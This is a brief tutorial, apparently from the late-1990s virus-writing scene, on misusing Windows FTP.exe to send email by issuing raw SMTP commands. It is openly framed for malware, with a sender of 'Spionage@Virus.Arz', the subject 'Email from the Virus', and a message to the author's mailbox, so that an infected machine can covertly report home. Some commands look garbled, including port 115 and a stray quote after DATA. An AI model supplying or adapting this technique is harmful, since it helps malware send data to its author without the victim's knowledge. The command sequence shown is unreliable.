How to use FTP.exe for sending an email ??
You get all FTP.exe commands with DOS Promt:
FTP -?

In FTP Promt:
?


Now to 'How to mail'
here is an example:

o mail@gmx.net 115
quote HELO Unknown
quote MAIL From:<Spionage@Virus.Arz>
quote RCPT To: Lord_Arz@gmx.net
quote DATA"
quote Subject: Email from the Virus
quote Date: 19.Jun.99
quote Greetings Lord
quote .
quote QUIT
quit

'quote .' tell the server that you finished the DATA !
